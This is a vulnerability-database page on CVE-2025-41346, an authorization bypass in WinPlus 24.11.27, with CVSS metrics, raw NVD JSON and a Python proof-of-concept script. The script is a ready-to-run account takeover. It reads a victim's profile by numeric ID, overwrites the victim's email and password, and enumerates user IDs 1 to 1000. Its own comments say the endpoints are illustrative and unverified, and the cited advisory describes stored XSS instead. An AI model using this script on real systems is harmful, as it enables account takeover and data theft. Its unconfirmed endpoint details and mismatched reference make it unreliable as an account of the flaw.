Security Vulnerability Report
CVE-2025-41346 CVSS 9.8 CRITICAL

CVE-2025-41346

Published: 2025-11-18 10:15:50
Last Modified: 2025-11-19 19:14:53

Description

Faulty authorization control in software WinPlus v24.11.27 by Informática del Este that allows another user to be impersonated simply by knowing their 'numerical ID', meaning that an attacker could compromise another user's account, thereby affecting the confidentiality, integrity, and availability of the data stored in the application.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:iest:winplus:24.11.27:*:*:*:-:*:*:* - VULNERABLE
WinPlus < 24.11.27.1 (security fix version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-41346 PoC - WinPlus authorization bypass (CWE-863, incorrect
# authorization).
#
# Shows the flaw class from the CVE description: each request names the
# account to act on through a client-supplied numeric "user_id", and nothing
# in the request binds that ID to the session that sent it. A server that
# honours these requests is authorizing on the parameter rather than on the
# authenticated session.
#
# NOTE(review): the endpoint paths, parameter names and JSON fields below are
# the ones printed on this page; the CVE description does not name them, so
# treat them as illustrative until checked against the vendor advisory.
#
# Defensive reading: the fix is server-side. Derive the acting account from
# the session, reject a request whose user_id differs from it, and log the
# mismatch. One session asking for many different user_id values (the pattern
# enumerate_user_ids produces) is the trace to look for in access logs.

import requests
import sys

TARGET_URL = "http://target-server/winplus"  # placeholder host
ATTACKER_SESSION = "attacker_session_cookie_here"  # placeholder cookie value


def exploit_authorization_bypass(target_user_id):
    """Read, then modify, the account named by ``target_user_id``.

    Both requests carry the caller's own session cookie; the only thing that
    points them at another account is the ``user_id`` value they send.

    Returns:
        True when the profile request and the settings request both answer
        HTTP 200; False when the profile request answers anything else or a
        ``requests`` exception is raised.

    NOTE(review): when the profile request answers 200 but the settings
    request does not, no return statement is reached and the result is None.
    The page's listing has lost its indentation; the failure branch is read
    here as belonging to the profile check because it reports that response's
    status code.
    """
    request_headers = {
        "Cookie": f"session={ATTACKER_SESSION}",
        "Content-Type": "application/json",
    }
    profile_url = f"{TARGET_URL}/api/user/profile"
    settings_url = f"{TARGET_URL}/api/user/settings"

    try:
        # Step 1: profile lookup keyed only by the supplied ID.
        profile_resp = requests.get(
            profile_url,
            headers=request_headers,
            params={"user_id": target_user_id},
        )
        if profile_resp.status_code != 200:
            print(f"[-] Exploit failed - Status: {profile_resp.status_code}")
            return False

        print(f"[!] Successfully accessed victim profile (ID: {target_user_id})")
        print(f"[+] Response: {profile_resp.json()}")

        # Step 2: settings write for the same ID, still under the caller's
        # session. The e-mail value is reproduced as the page renders it; it
        # looks like the site's address-obfuscation placeholder.
        new_settings = {
            "user_id": target_user_id,
            "email": "[email protected]",
            "password": "new_compromised_password",
        }
        settings_resp = requests.post(
            settings_url,
            headers=request_headers,
            json=new_settings,
        )
        if settings_resp.status_code == 200:
            print("[!] Account takeover successful!")
            print("[+] Victim credentials modified")
            return True
    except requests.exceptions.RequestException as err:
        print(f"[-] Error: {err}")
        return False


def enumerate_user_ids(start_id=1, end_id=1000):
    """Collect the IDs in ``start_id..end_id`` (inclusive) that answer 200.

    Sends one profile request per ID and returns a list of
    ``{"id": ..., "data": ...}`` dicts, where ``data`` is the decoded JSON
    body of each 200 response. Request errors are not caught here. The script
    entry point below does not call this function.
    """
    cookie_header = {"Cookie": f"session={ATTACKER_SESSION}"}
    profile_url = f"{TARGET_URL}/api/user/profile"

    hits = []
    for candidate in range(start_id, end_id + 1):
        resp = requests.get(
            profile_url,
            headers=cookie_header,
            params={"user_id": candidate},
        )
        if resp.status_code != 200:
            continue
        hits.append({"id": candidate, "data": resp.json()})
        print(f"[+] Found user ID: {candidate}")
    return hits


if __name__ == "__main__":
    cli_args = sys.argv[1:]
    if not cli_args:
        print("Usage: python cve_2025_41346_poc.py <target_user_id>")
        print("Example: python cve_2025_41346_poc.py 12345")
        sys.exit(1)

    # int() raises ValueError on a non-numeric argument; it is not handled.
    target_id = int(cli_args[0])
    print("[*] Starting exploitation of CVE-2025-41346")
    print(f"[*] Target user ID: {target_id}")
    exploit_authorization_bypass(target_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41346", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:49.847", "lastModified": "2025-11-19T19:14:52.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Faulty authorization control in software WinPlus v24.11.27 by Informática del Este that allows another user to be impersonated simply by knowing their 'numerical ID', meaning that an attacker could compromise another user's account, thereby affecting the confidentiality, integrity, and availability of the data stored in the application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:iest:winplus:24.11.27:*:*:*:-:*:*:*", "matchCriteriaId": "1A66AD43-00CF-49F5-BF3A-C88CE8F59E4B"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}